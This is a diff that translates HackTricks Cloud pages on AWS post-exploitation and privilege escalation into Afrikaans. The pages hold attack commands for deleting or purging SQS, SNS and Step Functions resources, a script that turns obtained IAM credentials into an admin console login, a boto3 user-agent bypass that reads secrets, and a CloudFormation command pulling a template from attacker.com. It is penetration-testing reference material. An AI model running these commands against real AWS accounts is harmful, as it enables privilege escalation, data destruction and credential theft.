- +'n Aanvaller kan die eienskappe van 'n SNS-tema wysig, wat moontlik sy prestasie, sekuriteit of beskikbaarheid kan beĂŻnvloed. ```bash aws sns set-topic-attributes --topic-arn --attribute-name --attribute-value ``` - -**Potential Impact**: Misconfigurations leading to degraded performance, security issues, or reduced availability. +**PotensiĂ«le Impak**: Misconfigurasies wat lei tot verminderde prestasie, sekuriteitskwessies, of verminderde beskikbaarheid. ### `sns:Subscribe` , `sns:Unsubscribe` -An attacker could subscribe or unsubscribe to an SNS topic, potentially gaining unauthorized access to messages or disrupting the normal functioning of applications relying on the topic. - +'n Aanvaller kan op 'n SNS onderwerp inteken of uitskakel, wat moontlik ongeoorloofde toegang tot boodskappe kan verkry of die normale funksionering van toepassings wat op die onderwerp staatmaak, kan ontwrig. ```bash aws sns subscribe --topic-arn --protocol --endpoint aws sns unsubscribe --subscription-arn ``` - -**Potential Impact**: Unauthorized access to messages, service disruption for applications relying on the affected topic. +**PotensiĂ«le Impak**: Onbevoegde toegang tot boodskappe, diensonderbreking vir toepassings wat op die betrokke onderwerp staatmaak. ### `sns:AddPermission` , `sns:RemovePermission` -An attacker could grant unauthorized users or services access to an SNS topic, or revoke permissions for legitimate users, causing disruptions in the normal functioning of applications that rely on the topic. - +'n Aanvaller kan onbevoegde gebruikers of dienste toegang tot 'n SNS-onderwerp verleen, of toestemmings vir wettige gebruikers intrek, wat onderbrekings in die normale funksionering van toepassings wat op die onderwerp staatmaak, veroorsaak. 
```css aws sns add-permission --topic-arn --label --aws-account-id --action-name aws sns remove-permission --topic-arn --label ``` - -**Potential Impact**: Unauthorized access to the topic, message exposure, or topic manipulation by unauthorized users or services, disruption of normal functioning for applications relying on the topic. +**PotensiĂ«le Impak**: Onbevoegde toegang tot die onderwerp, boodskapblootstelling, of onderwerpmanipulasie deur onbevoegde gebruikers of dienste, onderbreking van normale funksionering vir toepassings wat op die onderwerp staatmaak. ### `sns:TagResource` , `sns:UntagResource` -An attacker could add, modify, or remove tags from SNS resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags. - +'n Aanvaller kan etikette byvoeg, wysig of verwyder van SNS-hulpbronne, wat jou organisasie se koste-toewysing, hulpbronopsporing, en toegangbeheerbeleide gebaseer op etikette ontwrig. ```bash aws sns tag-resource --resource-arn --tags Key=,Value= aws sns untag-resource --resource-arn --tag-keys ``` - -**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies. +**PotensiĂ«le Impak**: Ontwrichting van koste-toewysing, hulpbronopsporing, en etiket-gebaseerde toegangbeheerbeleide. {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md index 872693e89..ea773c009 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md @@ -4,7 +4,7 @@ ## SQS -For more information check: +Vir meer inligting, kyk: {{#ref}} ../aws-services/aws-sqs-and-sns-enum.md 
@@ -12,80 +12,62 @@ For more information check: ### `sqs:SendMessage` , `sqs:SendMessageBatch` -An attacker could send malicious or unwanted messages to the SQS queue, potentially causing data corruption, triggering unintended actions, or exhausting resources. - +'n Aanvaller kan kwaadwillige of ongewenste boodskappe na die SQS-ry stuur, wat moontlik datakorruptie kan veroorsaak, onbedoelde aksies kan ontketen, of hulpbronne kan uitput. ```bash aws sqs send-message --queue-url --message-body aws sqs send-message-batch --queue-url --entries ``` - -**Potential Impact**: Vulnerability exploitation, Data corruption, unintended actions, or resource exhaustion. +**PotensiĂ«le Impak**: Kwetsbaarheid benutting, Gegevensbesoedeling, onbedoelde aksies, of hulpbronuitputting. ### `sqs:ReceiveMessage`, `sqs:DeleteMessage`, `sqs:ChangeMessageVisibility` -An attacker could receive, delete, or modify the visibility of messages in an SQS queue, causing message loss, data corruption, or service disruption for applications relying on those messages. - +'n Aanvaller kan boodskappe in 'n SQS-ry ontvang, verwyder of die sigbaarheid van boodskappe verander, wat kan lei tot boodskapverlies, gegevensbesoedeling, of diensonderbreking vir toepassings wat op daardie boodskappe staatmaak. ```bash aws sqs receive-message --queue-url aws sqs delete-message --queue-url --receipt-handle aws sqs change-message-visibility --queue-url --receipt-handle --visibility-timeout ``` - -**Potential Impact**: Steal sensitive information, Message loss, data corruption, and service disruption for applications relying on the affected messages. +**PotensiĂ«le Impak**: Steal sensitiewe inligting, boodskapverlies, datakorruptie, en diensonderbreking vir toepassings wat op die aangetaste boodskappe staatmaak. ### `sqs:DeleteQueue` -An attacker could delete an entire SQS queue, causing message loss and impacting applications relying on the queue. 
- +'n Aanvaller kan 'n hele SQS-rye verwyder, wat boodskapverlies veroorsaak en toepassings wat op die ry staatmaak, beĂŻnvloed. ```arduino Copy codeaws sqs delete-queue --queue-url ``` - -**Potential Impact**: Message loss and service disruption for applications using the deleted queue. +**PotensiĂ«le Impak**: Boodskapverlies en diensonderbreking vir toepassings wat die verwyderde wagte gebruik. ### `sqs:PurgeQueue` -An attacker could purge all messages from an SQS queue, leading to message loss and potential disruption of applications relying on those messages. - +'n Aanvaller kan alle boodskappe uit 'n SQS-wagte verwyder, wat lei tot boodskapverlies en potensiĂ«le onderbreking van toepassings wat op daardie boodskappe staatmaak. ```arduino Copy codeaws sqs purge-queue --queue-url ``` - -**Potential Impact**: Message loss and service disruption for applications relying on the purged messages. +**PotensiĂ«le Impak**: Boodskapverlies en diensonderbreking vir toepassings wat op die verwyderde boodskappe staatmaak. ### `sqs:SetQueueAttributes` -An attacker could modify the attributes of an SQS queue, potentially affecting its performance, security, or availability. - +'n Aanvaller kan die eienskappe van 'n SQS-ry kan verander, wat moontlik die prestasie, sekuriteit of beskikbaarheid daarvan beĂŻnvloed. ```arduino aws sqs set-queue-attributes --queue-url --attributes ``` - -**Potential Impact**: Misconfigurations leading to degraded performance, security issues, or reduced availability. +**PotensiĂ«le Impak**: Misconfigurasies wat lei tot verminderde prestasie, sekuriteitskwessies, of verminderde beskikbaarheid. ### `sqs:TagQueue` , `sqs:UntagQueue` -An attacker could add, modify, or remove tags from SQS resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags. 
- +'n Aanvaller kan etikette byvoeg, wysig of verwyder van SQS-hulpbronne, wat jou organisasie se koste-toewysing, hulpbronopsporing, en toegangbeheerbeleide gebaseer op etikette ontwrig. ```bash aws sqs tag-queue --queue-url --tags Key=,Value= aws sqs untag-queue --queue-url --tag-keys ``` - -**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies. +**PotensiĂ«le Impak**: Ontwrichting van koste-toewysing, hulpbronopsporing, en etiket-gebaseerde toegangbeheerbeleide. ### `sqs:RemovePermission` -An attacker could revoke permissions for legitimate users or services by removing policies associated with the SQS queue. This could lead to disruptions in the normal functioning of applications that rely on the queue. - +'n Aanvaller kan toestemming vir wettige gebruikers of dienste herroep deur beleide wat met die SQS-ry gekoppeld is, te verwyder. Dit kan lei tot ontwrichtings in die normale funksionering van toepassings wat op die ry staatmaak. ```arduino arduinoCopy codeaws sqs remove-permission --queue-url --label ``` - -**Potential Impact**: Disruption of normal functioning for applications relying on the queue due to unauthorized removal of permissions. +**PotensiĂ«le Impak**: Ontwrichting van normale funksionering vir toepassings wat op die waglys staatmaak as gevolg van ongeoorloofde verwydering van toestemmings. {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md index 0d636f261..0f24cd247 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md 
@@ -4,7 +4,7 @@ ## SSO & identitystore -For more information check: +Vir meer inligting, kyk: {{#ref}} ../aws-services/aws-iam-enum.md @@ -12,8 +12,7 @@ For more information check: ### `sso:DeletePermissionSet` | `sso:PutPermissionsBoundaryToPermissionSet` | `sso:DeleteAccountAssignment` -These permissions can be used to disrupt permissions: - +Hierdie toestemmings kan gebruik word om toestemmings te ontwrig: ```bash aws sso-admin delete-permission-set --instance-arn --permission-set-arn @@ -21,9 +20,4 @@ aws sso-admin put-permissions-boundary-to-permission-set --instance-arn --target-id --target-type --permission-set-arn --principal-type --principal-id ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md index 6a0cd5ba9..690d9e480 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md @@ -1,10 +1,10 @@ -# AWS - Step Functions Post Exploitation +# AWS - Stap Funksies Post Exploitatie {{#include ../../../banners/hacktricks-training.md}} -## Step Functions +## Stap Funksies -For more information about this AWS service, check: +Vir meer inligting oor hierdie AWS-diens, kyk: {{#ref}} ../aws-services/aws-stepfunctions-enum.md @@ -12,20 +12,19 @@ For more information about this AWS service, check: ### `states:RevealSecrets` -This permission allows to **reveal secret data inside an execution**. For it, it's needed to set Inspection level to TRACE and the revealSecrets parameter to true. +Hierdie toestemming laat toe om **geheime data binne 'n uitvoering te onthul**. Hiervoor is dit nodig om die Inspeksievlak op TRACE te stel en die revealSecrets parameter op true.
### `states:DeleteStateMachine`, `states:DeleteStateMachineVersion`, `states:DeleteStateMachineAlias` -An attacker with these permissions would be able to permanently delete state machines, their versions, and aliases. This can disrupt critical workflows, result in data loss, and require significant time to recover and restore the affected state machines. In addition, it would allow an attacker to cover the tracks used, disrupt forensic investigations, and potentially cripple operations by removing essential automation processes and state configurations. +'n Aanvaller met hierdie toestemmings sal in staat wees om staatmasjiene, hul weergawes en aliase permanent te verwyder. Dit kan kritieke werksvloei ontwrig, lei tot dataverlies, en 'n beduidende hoeveelheid tyd vereis om die geraakte staatmasjiene te herstel en te herstel. Boonop sal dit 'n aanvaller in staat stel om die spore wat gebruik is, te verberg, forensiese ondersoeke te ontwrig, en moontlik bedrywighede te verlam deur noodsaaklike outomatiseringsprosesse en staatkonfigurasies te verwyder. > [!NOTE] > -> - Deleting a state machine you also delete all its associated versions and aliases. -> - Deleting a state machine alias you do not delete the state machine versions referecing this alias. -> - It is not possible to delete a state machine version currently referenced by one o more aliases. - +> - Deur 'n staatmasjien te verwyder, verwyder jy ook al sy geassosieerde weergawes en aliase. +> - Deur 'n staatmasjienalias te verwyder, verwyder jy nie die staatmasjienweergawes wat na hierdie alias verwys nie. +> - Dit is nie moontlik om 'n staatmasjienweergawes te verwyder wat tans deur een of meer aliase verwys word nie. ```bash # Delete state machine aws stepfunctions delete-state-machine --state-machine-arn 
@@ -34,45 +33,34 @@ aws stepfunctions delete-state-machine-version --state-machine-version-arn ``` - -- **Potential Impact**: Disruption of critical workflows, data loss, and operational downtime. +- **PotensiĂ«le Impak**: Ontwrichting van kritieke werksvloeie, dataverlies, en operasionele stilstand. ### `states:UpdateMapRun` -An attacker with this permission would be able to manipulate the Map Run failure configuration and parallel setting, being able to increase or decrease the maximum number of child workflow executions allowed, affecting directly and performance of the service. In addition, an attacker could tamper with the tolerated failure percentage and count, being able to decrease this value to 0 so every time an item fails, the whole map run would fail, affecting directly to the state machine execution and potentially disrupting critical workflows. - +'n Aanvaller met hierdie toestemming sou in staat wees om die Map Run mislukking konfigurasie en parallel instelling te manipuleer, en sou in staat wees om die maksimum aantal kind werksvloei uitvoerings toegelaat te verhoog of te verlaag, wat direk die diens se prestasie beĂŻnvloed. Daarbenewens kan 'n aanvaller die toegelate mislukking persentasie en telling manipuleer, en sou in staat wees om hierdie waarde tot 0 te verlaag sodat elke keer as 'n item misluk, die hele kaart loop sou misluk, wat direk die staat masjien uitvoering beĂŻnvloed en potensieel kritieke werksvloeie ontwrig. ```bash aws stepfunctions update-map-run --map-run-arn [--max-concurrency ] [--tolerated-failure-percentage ] [--tolerated-failure-count ] ``` - -- **Potential Impact**: Performance degradation, and disruption of critical workflows. +- **PotensiĂ«le Impak**: Prestasiedegenerasie, en ontwrigting van kritieke werksvloei. ### `states:StopExecution` -An attacker with this permission could be able to stop the execution of any state machine, disrupting ongoing workflows and processes. 
This could lead to incomplete transactions, halted business operations, and potential data corruption. +'n Aanvaller met hierdie toestemming kan in staat wees om die uitvoering van enige staatmasjien te stop, wat lopende werksvloei en prosesse ontwrig. Dit kan lei tot onvoltooide transaksies, gestaakte besigheidsbedrywighede, en potensiĂ«le datakorruptie. > [!WARNING] -> This action is not supported by **express state machines**. - +> Hierdie aksie word nie ondersteun deur **express state machines**. ```bash aws stepfunctions stop-execution --execution-arn [--error ] [--cause ] ``` - -- **Potential Impact**: Disruption of ongoing workflows, operational downtime, and potential data corruption. +- **PotensiĂ«le Impak**: Ontwrichting van lopende werksvloei, operasionele stilstand, en potensiĂ«le datakorruptie. ### `states:TagResource`, `states:UntagResource` -An attacker could add, modify, or remove tags from Step Functions resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags. - +'n Aanvaller kan etikette byvoeg, wysig of verwyder van Step Functions hulpbronne, wat jou organisasie se koste-toewysing, hulpbronopsporing, en toegangbeheerbeleide gebaseer op etikette ontwrig. ```bash aws stepfunctions tag-resource --resource-arn --tags Key=,Value= aws stepfunctions untag-resource --resource-arn --tag-keys ``` - -**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies. +**PotensiĂ«le Impak**: Ontwrichting van koste-toewysing, hulpbronopsporing, en etiket-gebaseerde toegangbeheerbeleide. {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md index 3cabd1b71..f7760823e 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md 
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md @@ -4,21 +4,20 @@ ## STS -For more information: +Vir meer inligting: {{#ref}} ../aws-services/aws-iam-enum.md {{#endref}} -### From IAM Creds to Console +### Van IAM Krediete na Konsol -If you have managed to obtain some IAM credentials you might be interested on **accessing the web console** using the following tools.\ -Note that the the user/role must have the permission **`sts:GetFederationToken`**. +As jy daarin geslaag het om 'n paar IAM krediete te verkry, mag jy belangstel om **die webkonsol te benader** met behulp van die volgende gereedskap.\ +Let daarop dat die gebruiker/rol die toestemming **`sts:GetFederationToken`** moet hĂȘ. -#### Custom script - -The following script will use the default profile and a default AWS location (not gov and not cn) to give you a signed URL you can use to login inside the web console: +#### Pasgemaakte skrif +Die volgende skrif sal die standaard profiel en 'n standaard AWS ligging (nie gov en nie cn) gebruik om vir jou 'n geskrewe URL te gee wat jy kan gebruik om in die webkonsol aan te meld: ```bash # Get federated creds (you must indicate a policy or they won't have any perms) ## Even if you don't have Admin access you can indicate that policy to make sure you get all your privileges @@ -26,8 +25,8 @@ The following script will use the default profile and a default AWS location (no output=$(aws sts get-federation-token --name consoler --policy-arns arn=arn:aws:iam::aws:policy/AdministratorAccess) if [ $? -ne 0 ]; then - echo "The command 'aws sts get-federation-token --name consoler' failed with exit status $status" - exit $status +echo "The command 'aws sts get-federation-token --name consoler' failed with exit status $status" +exit $status fi # Parse the output 
@@ -43,10 +42,10 @@ federation_endpoint="https://signin.aws.amazon.com/federation" # Make the HTTP request to get the sign-in token resp=$(curl -s "$federation_endpoint" \ - --get \ - --data-urlencode "Action=getSigninToken" \ - --data-urlencode "SessionDuration=43200" \ - --data-urlencode "Session=$json_creds" +--get \ +--data-urlencode "Action=getSigninToken" \ +--data-urlencode "SessionDuration=43200" \ +--data-urlencode "Session=$json_creds" ) signin_token=$(echo -n $resp | jq -r '.SigninToken' | tr -d '\n' | jq -sRr @uri) @@ -55,11 +54,9 @@ signin_token=$(echo -n $resp | jq -r '.SigninToken' | tr -d '\n' | jq -sRr @uri) # Give the URL to login echo -n "https://signin.aws.amazon.com/federation?Action=login&Issuer=example.com&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2F&SigninToken=$signin_token" ``` - #### aws_consoler -You can **generate a web console link** with [https://github.com/NetSPI/aws_consoler](https://github.com/NetSPI/aws_consoler). - +Jy kan **'n webkonsolskakel genereer** met [https://github.com/NetSPI/aws_consoler](https://github.com/NetSPI/aws_consoler). ```bash cd /tmp python3 -m venv env 
@@ -67,27 +64,23 @@ source ./env/bin/activate pip install aws-consoler aws_consoler [params...] #This will generate a link to login into the console ``` - > [!WARNING] -> Ensure the IAM user has `sts:GetFederationToken` permission, or provide a role to assume. +> Verseker dat die IAM-gebruiker `sts:GetFederationToken` toestemming het, of verskaf 'n rol om aan te neem. #### aws-vault -[**aws-vault**](https://github.com/99designs/aws-vault) is a tool to securely store and access AWS credentials in a development environment. - +[**aws-vault**](https://github.com/99designs/aws-vault) is 'n hulpmiddel om AWS-akkrediteerings veilig te stoor en toegang daartoe te verkry in 'n ontwikkelingsomgewing. ```bash aws-vault list aws-vault exec jonsmith -- aws s3 ls # Execute aws cli with jonsmith creds aws-vault login jonsmith # Open a browser logged as jonsmith ``` - > [!NOTE] -> You can also use **aws-vault** to obtain an **browser console session** +> Jy kan ook **aws-vault** gebruik om 'n **blaaier-konsolesessie** te verkry. -### **Bypass User-Agent restrictions from Python** - -If there is a **restriction to perform certain actions based on the user agent** used (like restricting the use of python boto3 library based on the user agent) it's possible to use the previous technique to **connect to the web console via a browser**, or you could directly **modify the boto3 user-agent** by doing: +### **Omseil User-Agent beperkings vanaf Python** +As daar 'n **beperking is om sekere aksies uit te voer gebaseer op die gebruikersagent** wat gebruik word (soos om die gebruik van die python boto3 biblioteek te beperk gebaseer op die gebruikersagent), is dit moontlik om die vorige tegniek te gebruik om **verbinding te maak met die webkonsol deur 'n blaaier**, of jy kan direk die **boto3 gebruikersagent** wysig deur: ```bash # Shared by ex16x41 # Create a client 
@@ -100,9 +93,4 @@ client.meta.events.register( 'before-call.secretsmanager.GetSecretValue', lambda # Perform the action response = client.get_secret_value(SecretId="flag_secret") print(response['SecretString']) ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md index fe4f69e25..58bd1165e 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md @@ -4,14 +4,10 @@ ## VPN -For more information: +Vir meer inligting: {{#ref}} ../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/ {{#endref}} {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/README.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/README.md index ba8374b41..b4e45fd6d 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/README.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/README.md 
@@ -4,16 +4,16 @@ ## AWS Privilege Escalation -The way to escalate your privileges in AWS is to have enough permissions to be able to, somehow, access other roles/users/groups privileges. Chaining escalations until you have admin access over the organization. +Die manier om jou voorregte in AWS te verhoog, is om genoeg toestemmings te hĂȘ om op een of ander manier toegang te verkry tot ander rolle/gebruikers/groepe se voorregte. Kettingverhogings totdat jy admin-toegang oor die organisasie het. > [!WARNING] -> AWS has **hundreds** (if not thousands) of **permissions** that an entity can be granted. In this book you can find **all the permissions that I know** that you can abuse to **escalate privileges**, but if you **know some path** not mentioned here, **please share it**. +> AWS het **honderde** (indien nie duisende nie) **toestemmings** wat aan 'n entiteit toegeken kan word. In hierdie boek kan jy **alle toestemmings wat ek ken** vind wat jy kan misbruik om **voorregte te verhoog**, maar as jy **'n pad weet** wat hier nie genoem word nie, **deel dit asseblief**. > [!CAUTION] -> If an IAM policy has `"Effect": "Allow"` and `"NotAction": "Someaction"` indicating a **resource**... that means that the **allowed principal** has **permission to do ANYTHING but that specified action**.\ -> So remember that this is another way to **grant privileged permissions** to a principal. +> As 'n IAM-beleid `"Effect": "Allow"` en `"NotAction": "Someaction"` het wat 'n **bron** aandui... beteken dit dat die **toegelate prinsiep** **toestemming het om ENIGE DING te doen behalwe daardie spesifieke aksie**.\ +> So onthou dat dit 'n ander manier is om **bevoorregte toestemmings** aan 'n prinsiep toe te ken. -**The pages of this section are ordered by AWS service. In there you will be able to find permissions that will allow you to escalate privileges.** +**Die bladsye van hierdie afdeling is georden volgens AWS-diens. 
Daar sal jy toestemmings vind wat jou in staat sal stel om voorregte te verhoog.** ## Tools @@ -21,7 +21,3 @@ The way to escalate your privileges in AWS is to have enough permissions to be a - [Pacu](https://github.com/RhinoSecurityLabs/pacu) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md index 7f7edbc6e..19959dc5e 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md @@ -4,7 +4,7 @@ ## Apigateway -For more information check: +Vir meer inligting, kyk: {{#ref}} ../aws-services/aws-api-gateway-enum.md 
@@ -12,44 +12,37 @@ For more information check: ### `apigateway:POST` -With this permission you can generate API keys of the APIs configured (per region). - +Met hierdie toestemming kan jy API-sleutels van die geconfigureerde API's genereer (per streek). ```bash aws --region apigateway create-api-key ``` - -**Potential Impact:** You cannot privesc with this technique but you might get access to sensitive info. +**PotensiĂ«le Impak:** Jy kan nie privesc met hierdie tegniek nie, maar jy mag toegang tot sensitiewe inligting kry. ### `apigateway:GET` -With this permission you can get generated API keys of the APIs configured (per region). - +Met hierdie toestemming kan jy gegenereerde API-sleutels van die geconfigureerde API's (per streek) kry. ```bash aws --region apigateway get-api-keys aws --region apigateway get-api-key --api-key --include-value ``` - -**Potential Impact:** You cannot privesc with this technique but you might get access to sensitive info. +**PotensiĂ«le Impak:** Jy kan nie privesc met hierdie tegniek nie, maar jy mag toegang tot sensitiewe inligting kry. ### `apigateway:UpdateRestApiPolicy`, `apigateway:PATCH` -With these permissions it's possible to modify the resource policy of an API to give yourself access to call it and abuse potential access the API gateway might have (like invoking a vulnerable lambda). - +Met hierdie toestemmings is dit moontlik om die hulpbronbeleid van 'n API te wysig om jouself toegang te gee om dit aan te roep en die potensiĂ«le toegang wat die API-gateway mag hĂȘ, te misbruik (soos om 'n kwesbare lambda aan te roep). ```bash aws apigateway update-rest-api \ - --rest-api-id api-id \ - --patch-operations op=replace,path=/policy,value='"{\"jsonEscapedPolicyDocument\"}"' +--rest-api-id api-id \ +--patch-operations op=replace,path=/policy,value='"{\"jsonEscapedPolicyDocument\"}"' ``` - -**Potential Impact:** You, usually, won't be able to privesc directly with this technique but you might get access to sensitive info. 
+**PotensiĂ«le Impak:** Jy sal gewoonlik nie direk met hierdie tegniek kan privesc nie, maar jy mag toegang tot sensitiewe inligting kry. ### `apigateway:PutIntegration`, `apigateway:CreateDeployment`, `iam:PassRole` > [!NOTE] -> Need testing - -An attacker with the permissions `apigateway:PutIntegration`, `apigateway:CreateDeployment`, and `iam:PassRole` can **add a new integration to an existing API Gateway REST API with a Lambda function that has an IAM role attached**. The attacker can then **trigger the Lambda function to execute arbitrary code and potentially gain access to the resources associated with the IAM role**. +> Moet getoets word +'n Aanvaller met die toestemmings `apigateway:PutIntegration`, `apigateway:CreateDeployment`, en `iam:PassRole` kan **'n nuwe integrasie by 'n bestaande API Gateway REST API met 'n Lambda-funksie wat 'n IAM-rol het, voeg**. Die aanvaller kan dan **die Lambda-funksie aktiveer om arbitrĂȘre kode uit te voer en moontlik toegang tot die hulpbronne wat met die IAM-rol geassosieer is, te verkry**. ```bash API_ID="your-api-id" RESOURCE_ID="your-resource-id" 
@@ -63,16 +56,14 @@ aws apigateway put-integration --rest-api-id $API_ID --resource-id $RESOURCE_ID # Create a deployment for the updated API Gateway REST API aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod ``` - -**Potential Impact**: Access to resources associated with the Lambda function's IAM role. +**PotensiĂ«le Impak**: Toegang tot hulpbronne geassosieer met die Lambda-funksie se IAM-rol. ### `apigateway:UpdateAuthorizer`, `apigateway:CreateDeployment` > [!NOTE] -> Need testing - -An attacker with the permissions `apigateway:UpdateAuthorizer` and `apigateway:CreateDeployment` can **modify an existing API Gateway authorizer** to bypass security checks or to execute arbitrary code when API requests are made. +> Nodig om te toets +'n Aanvaller met die regte `apigateway:UpdateAuthorizer` en `apigateway:CreateDeployment` kan **'n bestaande API Gateway-outeur** wysig om sekuriteitskontroles te omseil of om arbitrĂȘre kode uit te voer wanneer API-versoeke gemaak word. ```bash API_ID="your-api-id" AUTHORIZER_ID="your-authorizer-id" 
@@ -84,16 +75,14 @@ aws apigateway update-authorizer --rest-api-id $API_ID --authorizer-id $AUTHORIZ # Create a deployment for the updated API Gateway REST API aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod ``` - -**Potential Impact**: Bypassing security checks, unauthorized access to API resources. +**PotensiĂ«le Impak**: Omseiling van sekuriteitskontroles, ongeoorloofde toegang tot API-hulpbronne. ### `apigateway:UpdateVpcLink` > [!NOTE] -> Need testing - -An attacker with the permission `apigateway:UpdateVpcLink` can **modify an existing VPC Link to point to a different Network Load Balancer, potentially redirecting private API traffic to unauthorized or malicious resources**. +> Nodig om te toets +'n Aanvaller met die toestemming `apigateway:UpdateVpcLink` kan **'n bestaande VPC-koppeling wysig om na 'n ander Netwerk Laai Balans te verwys, wat moontlik private API-verkeer na ongeoorloofde of kwaadwillige hulpbronne kan herlei**. ```bash bashCopy codeVPC_LINK_ID="your-vpc-link-id" NEW_NLB_ARN="arn:aws:elasticloadbalancing:region:account-id:loadbalancer/net/new-load-balancer-name/50dc6c495c0c9188" @@ -101,11 +90,6 @@ NEW_NLB_ARN="arn:aws:elasticloadbalancing:region:account-id:loadbalancer/net/new # Update the VPC Link aws apigateway update-vpc-link --vpc-link-id $VPC_LINK_ID --patch-operations op=replace,path=/targetArns,value="[$NEW_NLB_ARN]" ``` - -**Potential Impact**: Unauthorized access to private API resources, interception or disruption of API traffic. +**PotensiĂ«le Impak**: Onbevoegde toegang tot private API-hulpbronne, onderskepping of onderbreking van API-verkeer. {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md index b477dc31f..f4e2282e8 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md 
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md @@ -7,7 +7,3 @@ TODO {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md index 39cba539e..2ba388c14 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md @@ -4,7 +4,7 @@ ## cloudformation -For more information about cloudformation check: +Vir meer inligting oor cloudformation, kyk: {{#ref}} ../../aws-services/aws-cloudformation-and-codestar-enum.md 
@@ -12,111 +12,99 @@ For more information about cloudformation check: ### `iam:PassRole`, `cloudformation:CreateStack` -An attacker with these permissions **can escalate privileges** by crafting a **CloudFormation stack** with a custom template, hosted on their server, to **execute actions under the permissions of a specified role:** - +'n Aanvaller met hierdie toestemmings **kan voorregte verhoog** deur 'n **CloudFormation-stapel** te skep met 'n pasgemaakte sjabloon, gehos op hul bediener, om **aksies uit te voer onder die toestemmings van 'n gespesifiseerde rol:** ```bash aws cloudformation create-stack --stack-name \ - --template-url http://attacker.com/attackers.template \ - --role-arn +--template-url http://attacker.com/attackers.template \ +--role-arn ``` - -In the following page you have an **exploitation example** with the additional permission **`cloudformation:DescribeStacks`**: +In die volgende bladsy het jy 'n **uitbuiting voorbeeld** met die bykomende toestemming **`cloudformation:DescribeStacks`**: {{#ref}} iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md {{#endref}} -**Potential Impact:** Privesc to the cloudformation service role specified. +**PotensiĂ«le Impak:** Privesc na die cloudformation diensrol wat gespesifiseer is. 
